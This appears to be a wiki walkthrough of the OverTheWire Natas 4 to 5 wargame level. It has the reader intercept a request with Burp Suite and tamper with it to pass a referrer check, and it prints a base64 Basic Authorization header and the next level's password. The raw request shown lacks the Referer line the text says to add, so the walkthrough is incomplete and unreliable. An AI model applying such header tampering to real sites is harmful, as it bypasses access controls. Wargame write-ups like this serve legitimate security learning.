Natas4 - natas5

From JaxHax
Jump to navigation Jump to search

Level Goal

Access disallowed. You are visiting from "" while authorized users should come only from ""

[Refresh page]


Seems like this is a refer challenge. Time to fire up Burp Suite...

Once you set it as your browser's proxy to intercept packets, modify the packet to be the following:

GET /index.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [REDACTED]
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive

The page should respond with the following:

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq